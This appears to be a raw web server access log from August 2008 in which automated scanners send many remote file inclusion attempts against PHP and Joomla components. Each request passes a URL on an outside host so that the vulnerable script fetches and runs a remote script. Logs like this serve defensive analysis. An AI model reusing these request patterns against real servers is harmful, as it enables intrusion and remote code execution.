85.25.139.184 - - [24/Aug/2008:10:18:17 -0700] "GET /logs/access_080706.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:18:17 -0700] "GET /logs/access_080706.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:18:17 -0700] "GET /logs/access_080706.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.58.154.237 - - [24/Aug/2008:10:18:17 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.58.154.237 - - [24/Aug/2008:10:18:18 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:18:18 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:18:18 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.58.154.237 - - [24/Aug/2008:10:18:18 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:18:18 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:18:18 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:18:18 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:18:19 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:18:19 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:18:19 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.58.154.237 - - [24/Aug/2008:10:18:19 -0700] "GET /logs/access_080706.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.212.108 - - [24/Aug/2008:10:18:19 -0700] "GET /logs/access_080302.log/?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:18:19 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:18:19 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:18:19 -0700] "GET /logs/access_080706.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:18:19 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:18:19 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:18:20 -0700] "GET /logs/access_080706.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:18:20 -0700] "GET /logs/access_080706.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.212.108 - - [24/Aug/2008:10:18:20 -0700] "GET /?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 9915 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:18:20 -0700] "GET /logs/access_080706.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.212.108 - - [24/Aug/2008:10:18:21 -0700] "GET /logs/?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 61999 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:18:23 -0700] "GET /logs/access_080801.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:18:23 -0700] "GET /logs/access_080129.log/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:18:24 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:18:24 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:18:25 -0700] "GET /logs/access_080215.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:18:25 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:18:26 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [24/Aug/2008:10:18:30 -0700] "GET /logs/access_080302.log/?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [24/Aug/2008:10:18:31 -0700] "GET /?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 9915 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [24/Aug/2008:10:18:31 -0700] "GET /logs/?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 61999 "-" "libwww-perl/5.805" "www.dmulk.com"
62.149.232.117 - - [24/Aug/2008:10:18:35 -0700] "GET /logs/access_080708.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.232.117 - - [24/Aug/2008:10:18:35 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.232.117 - - [24/Aug/2008:10:18:36 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.97.183.24 - - [24/Aug/2008:10:18:37 -0700] "GET /logs/access_080703.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.10.154.65 - - [24/Aug/2008:10:18:53 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 200 10036 "-" "libwww-perl/5.810" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:10:18:54 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.bdc4u.com/logo/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
74.55.37.146 - - [24/Aug/2008:10:18:58 -0700] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://www.bdc4u.com/logo/bo.do?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
74.55.37.146 - - [24/Aug/2008:10:18:58 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.bdc4u.com/logo/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
62.149.232.117 - - [24/Aug/2008:10:18:58 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.232.117 - - [24/Aug/2008:10:18:59 -0700] "GET /logs/access_080708.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.232.117 - - [24/Aug/2008:10:19:00 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.248.62.98 - - [24/Aug/2008:10:19:03 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.248.62.98 - - [24/Aug/2008:10:19:04 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.248.62.98 - - [24/Aug/2008:10:19:05 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.248.62.98 - - [24/Aug/2008:10:19:06 -0700] "GET /logs/access_080706.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.55.109.34 - - [24/Aug/2008:10:19:13 -0700] "GET /logs/access_080224.log/?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.93.128.125 - - [24/Aug/2008:10:19:17 -0700] "GET /logs/access_080302.log/?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
91.93.128.125 - - [24/Aug/2008:10:19:18 -0700] "GET /?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 9915 "-" "libwww-perl/5.813" "www.dmulk.com"
91.93.128.125 - - [24/Aug/2008:10:19:19 -0700] "GET /logs/?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 61999 "-" "libwww-perl/5.813" "www.dmulk.com"
62.149.232.117 - - [24/Aug/2008:10:19:19 -0700] "GET /logs/access_080711.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.29.218 - - [24/Aug/2008:10:19:25 -0700] "GET /logs/access_080224.log/?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [24/Aug/2008:10:19:29 -0700] "GET /logs/access_080224.log/?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.244 - - [24/Aug/2008:10:19:32 -0700] "GET /logs/access_080302.log/?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.244 - - [24/Aug/2008:10:19:33 -0700] "GET /?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 9915 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:19:33 -0700] "GET /logs/access_080410.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:19:33 -0700] "GET /logs/access_080410.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:19:33 -0700] "GET /logs/access_080410.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:19:34 -0700] "GET /logs/access_080410.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:19:34 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:19:34 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:19:34 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.244 - - [24/Aug/2008:10:19:34 -0700] "GET /logs/?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 61999 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:19:34 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:19:34 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:19:34 -0700] "GET /logs/access_080410.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:19:34 -0700] "GET /logs/access_080410.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:19:34 -0700] "GET /logs/access_080410.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:19:34 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:19:34 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:19:34 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:19:35 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:19:35 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:19:35 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:19:35 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:19:35 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:19:35 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.10.154.65 - - [24/Aug/2008:10:19:36 -0700] "GET /logs/access_080410.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.10.154.65 - - [24/Aug/2008:10:19:36 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.10.154.65 - - [24/Aug/2008:10:19:36 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
86.58.154.237 - - [24/Aug/2008:10:19:38 -0700] "GET /logs/access_080410.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.58.154.237 - - [24/Aug/2008:10:19:39 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.58.154.237 - - [24/Aug/2008:10:19:39 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.93.54.60 - - [24/Aug/2008:10:19:45 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.54.60 - - [24/Aug/2008:10:19:45 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.54.60 - - [24/Aug/2008:10:19:45 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.54.60 - - [24/Aug/2008:10:19:47 -0700] "GET /logs/access_080706.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.200.212.3 - - [24/Aug/2008:10:19:59 -0700] "GET /logs/access_080718.log/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.200.212.3 - - [24/Aug/2008:10:20:00 -0700] "GET /plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.200.212.3 - - [24/Aug/2008:10:20:00 -0700] "GET /logs/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.94.70.15 - - [24/Aug/2008:10:20:00 -0700] "GET /logs/access_080803.log///vwar/backup/errors.php?error=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.70.15 - - [24/Aug/2008:10:20:01 -0700] "GET ///vwar/backup/errors.php?error=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.248.62.98 - - [24/Aug/2008:10:20:01 -0700] "GET /logs/access_080410.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.70.15 - - [24/Aug/2008:10:20:01 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.248.62.98 - - [24/Aug/2008:10:20:01 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.248.62.98 - - [24/Aug/2008:10:20:02 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:20:07 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:20:07 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:20:07 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:20:09 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:20:09 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:20:11 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.10.154.65 - - [24/Aug/2008:10:20:11 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:20:12 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
